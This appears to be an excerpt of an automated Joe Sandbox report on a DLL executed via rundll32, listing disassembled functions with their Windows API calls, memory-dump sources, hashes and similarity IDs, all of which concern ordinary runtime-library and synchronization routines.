                                                                                                                                                              • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099CB8
                                                                                                                                                              • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099CC6
                                                                                                                                                              • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099D13
                                                                                                                                                              • Part of subcall function 0000000180099C70: RtlInitializeConditionVariable.NTDLL ref: 0000000180099D21
                                                                                                                                                            • RtlInitializeConditionVariable.NTDLL ref: 000000018009BAF7
                                                                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BB64
                                                                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BC71
                                                                                                                                                              • Part of subcall function 00000001800D505C: Concurrency::cancel_current_task.LIBCPMT ref: 00000001800D508C
                                                                                                                                                              • Part of subcall function 00000001800D505C: Concurrency::cancel_current_task.LIBCPMT ref: 00000001800D5092
                                                                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BD04
                                                                                                                                                            • CreateEventW.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BD15
                                                                                                                                                            • InitializeCriticalSection.KERNEL32 ref: 000000018009BDFA
                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BEA7
                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BF31
                                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 000000018009BF62
                                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 000000018009BF94
                                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 000000018009BF9F
                                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 000000018009BFAA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$Initialize$Delete$Concurrency::cancel_current_taskConditionVariable$CloseCreateEventHandle
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 230857104-0
                                                                                                                                                            • Opcode ID: a877f73eb4a0cc73d247b8665ae12c0b89afea62d282fefbff238ad0fbcf9c11
                                                                                                                                                            • Instruction ID: 16dd56e71a98a8fe38ead4268d941e7a59e1ec6387c67001032f1325c4e9e75d
                                                                                                                                                            • Opcode Fuzzy Hash: a877f73eb4a0cc73d247b8665ae12c0b89afea62d282fefbff238ad0fbcf9c11
                                                                                                                                                            • Instruction Fuzzy Hash: 5ED17132405F8882E396CB20FD943D9B3E9FB9A790F51D21AD6DA42670DF78D698C740
                                                                                                                                                            Function 00000001800EFAF4 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 570795689-0
                                                                                                                                                            • Opcode ID: 1dcd191b440b39cb994a857398b107563d6fd41073885bb539776dc5a2793a2a
                                                                                                                                                            • Instruction ID: 9ec4bcfaacd67bd7be5f2c6c23ff2cc11b1865c540bc1b41079cacaeb76c1345
                                                                                                                                                            • Opcode Fuzzy Hash: 1dcd191b440b39cb994a857398b107563d6fd41073885bb539776dc5a2793a2a
                                                                                                                                                            • Instruction Fuzzy Hash: 98416F3030468D42FAEB673199A53FD52425F4D7F0F65C728BA366ABD2DE289B4D9300
                                                                                                                                                            Function 0000000180099560 Relevance: 16.9, APIs: 11, Instructions: 407synchronizationthreadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseCodeErrorExitHandleLastObjectSingleThreadWait
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 715548631-0
                                                                                                                                                            • Opcode ID: 701ce82fddf24a6dc0cc6819650e4a14b1158c76ac60a64b1f577d277cb7041b
                                                                                                                                                            • Instruction ID: d4a4ad110a7379173bcc36970285a8a200778f275078fe0ae0b16c97a83e6880
                                                                                                                                                            • Opcode Fuzzy Hash: 701ce82fddf24a6dc0cc6819650e4a14b1158c76ac60a64b1f577d277cb7041b
                                                                                                                                                            • Instruction Fuzzy Hash: E702AF72606B8885EB96CFA9E4443ED77A5F788BD8F148115EE4D03BA4DF78C649C340
                                                                                                                                                            Function 0000000180041E70 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 170COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Concurrency::cancel_current_taskLockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                            • String ID: bad locale name$false$true
                                                                                                                                                            • API String ID: 461674175-1062449267
                                                                                                                                                            • Opcode ID: 1a960a7bf9c5bdb67dcab4a702383698bc1a37f2da21523b0c3c2fa08cdc4277
                                                                                                                                                            • Instruction ID: 7f4c0dd69d64a2e519a89c0408eed1bde46919adf4286db9a4fea514131e2538
                                                                                                                                                            • Opcode Fuzzy Hash: 1a960a7bf9c5bdb67dcab4a702383698bc1a37f2da21523b0c3c2fa08cdc4277
                                                                                                                                                            • Instruction Fuzzy Hash: 39718032701B448AFB96DFB0D4913DC33B5EB48788F458129AE4967B5ADF34C619C398
                                                                                                                                                            Function 0000000180099C70 Relevance: 13.8, APIs: 9, Instructions: 284COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Initialize$CriticalSection$Concurrency::cancel_current_taskConditionVariable$CreateSemaphore
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 587327768-0
                                                                                                                                                            • Opcode ID: 073037f3f5bcf2f7dd3c5580214dcea6dca69115b8242414d5a9b36cdc0c840b
                                                                                                                                                            • Instruction ID: bacc5767debf166278b71937d87c4d40db06fba7c828773fc2802f3724ac9812
                                                                                                                                                            • Opcode Fuzzy Hash: 073037f3f5bcf2f7dd3c5580214dcea6dca69115b8242414d5a9b36cdc0c840b
                                                                                                                                                            • Instruction Fuzzy Hash: 15E1F532201F849AE7968F24E8843CD77B8F749758F519229DB9D53B64EF38C6A9C340
                                                                                                                                                            Function 00000001800EFF24 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00000001800F0774,?,?,?,?,00000001800DB89A), ref: 00000001800F00A0
                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00000001800F0774,?,?,?,?,00000001800DB89A), ref: 00000001800F00AC
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                            • Opcode ID: bb80c46524efd334e0948ec5fde6f5b3acf71997aa830e5d0c0555cb348075c0
                                                                                                                                                            • Instruction ID: 9e20b040cd1b5661f49696f8373896ce597b257fd6a3f0defee87b89056d177f
                                                                                                                                                            • Opcode Fuzzy Hash: bb80c46524efd334e0948ec5fde6f5b3acf71997aa830e5d0c0555cb348075c0
                                                                                                                                                            • Instruction Fuzzy Hash: 0F41E032311A4886EB97CB16A8087E62391BB4DBE0F59D129BD0D577D4EE39CA4D9300
                                                                                                                                                            Function 00000001800DC260 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: f$p$p
                                                                                                                                                            • API String ID: 3215553584-1995029353
                                                                                                                                                            • Opcode ID: ed79370b00d8e8658ded3e492e09794217c34b99c512f83fb9569cde87e5cc5f
                                                                                                                                                            • Instruction ID: 96a00a691172ba3443d11c4982911cf9766be878af63e4870790c223ab62484d
                                                                                                                                                            • Opcode Fuzzy Hash: ed79370b00d8e8658ded3e492e09794217c34b99c512f83fb9569cde87e5cc5f
                                                                                                                                                            • Instruction Fuzzy Hash: A712947260424B86FBA65B14E054BFD72A1F7487D0FD8C215FA9147AC4DF38C6889F26
                                                                                                                                                            Function 00000001800D4C5C Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiStringWide
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2829165498-0
                                                                                                                                                            • Opcode ID: 44485f7753f9c64bca2118c71e251ed8770b17291ac18f0f18f66950d9041ec7
                                                                                                                                                            • Instruction ID: 5a97a349b29dd6e7b5ac608a3e284f06584119dc4d9a85b610e319804b2a6361
                                                                                                                                                            • Opcode Fuzzy Hash: 44485f7753f9c64bca2118c71e251ed8770b17291ac18f0f18f66950d9041ec7
                                                                                                                                                            • Instruction Fuzzy Hash: D091727360078486EBE68F2594403ADB2E5F748BE8F548725FE594BBD4DF38C6098710
                                                                                                                                                            Function 000000018003CD60 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                            • Opcode ID: 24677e321ac5ee4d1a04d18d3265de91d17da8cb2206eb616759a8d8e1f823ff
                                                                                                                                                            • Instruction ID: 61791d6681c3f4ad3dfa316d05c0a73c09026118eba7547e925a0575426d869f
                                                                                                                                                            • Opcode Fuzzy Hash: 24677e321ac5ee4d1a04d18d3265de91d17da8cb2206eb616759a8d8e1f823ff
                                                                                                                                                            • Instruction Fuzzy Hash: E231A236205A0882EAD39B65F8843DAB761E78C7E0F15C125FE98477E6DE7CC6498700
                                                                                                                                                            Function 0000000180041C10 Relevance: 9.1, APIs: 6, Instructions: 70COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                            • Opcode ID: dd0db9ab5b724912ec2026415335d458f002f1e7d8cb1aaf0fdef404c58ad89a
                                                                                                                                                            • Instruction ID: 3e18f53febbc17cc81b0eea23b64b476764291fb2201fd083bcd6cee7e18a8ac
                                                                                                                                                            • Opcode Fuzzy Hash: dd0db9ab5b724912ec2026415335d458f002f1e7d8cb1aaf0fdef404c58ad89a
                                                                                                                                                            • Instruction Fuzzy Hash: 99217F36201E0845EA929B65E8C43E96362F78CBE5F45C225BE1C477F6DF68C649C704
                                                                                                                                                            Function 00000001800EFC6C Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFC7B
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFCB1
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFCDE
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFCEF
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFD00
                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFD1B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: 5300be7ecbd16052b9e70f3c74c09ae5a72c476940d089165e31decfe542c1dd
                                                                                                                                                            • Instruction ID: 534ee9dd9013db177466b5afa872c7489071b3bf08e507150bf2a31af924fab8
                                                                                                                                                            • Opcode Fuzzy Hash: 5300be7ecbd16052b9e70f3c74c09ae5a72c476940d089165e31decfe542c1dd
                                                                                                                                                            • Instruction Fuzzy Hash: 06116D3430468C42FAEB67316A953FD52425F4C7F0F65C728B93657BD6DE28DA499300
                                                                                                                                                            Function 00000001800297E0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                            • API String ID: 2967684691-1405518554
                                                                                                                                                            • Opcode ID: 492b9f12d2017c85e3b9038361cbb09bb50bf92a85eee2bc8d229eea44332673
                                                                                                                                                            • Instruction ID: 257ebd258958192414c0201136383fc5e51e53a75ac9e0a2a349a042fac65805
                                                                                                                                                            • Opcode Fuzzy Hash: 492b9f12d2017c85e3b9038361cbb09bb50bf92a85eee2bc8d229eea44332673
                                                                                                                                                            • Instruction Fuzzy Hash: 86919F33705B888AFB92CF64D4903ED77A1EB887C4F048129EE891BA99DF34C659D350
                                                                                                                                                            Function 00000001800D65BC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00000001800D663F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                            • API String ID: 3511171328-631824599
                                                                                                                                                            • Opcode ID: 3b3216ce6001b72eff62068510a6f0b8e4e3afcdb252984c26514cbf29c63a7a
                                                                                                                                                            • Instruction ID: 283167450af4393c368174901eda81c10499684aeee4801c6a5cb384dfff630c
                                                                                                                                                            • Opcode Fuzzy Hash: 3b3216ce6001b72eff62068510a6f0b8e4e3afcdb252984c26514cbf29c63a7a
                                                                                                                                                            • Instruction Fuzzy Hash: 55117732610B4497FB869B22E5493D932A1FB58755F40D115E64983A60EF78D278C710
                                                                                                                                                            Function 00000001800996E0 Relevance: 7.8, APIs: 5, Instructions: 271COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
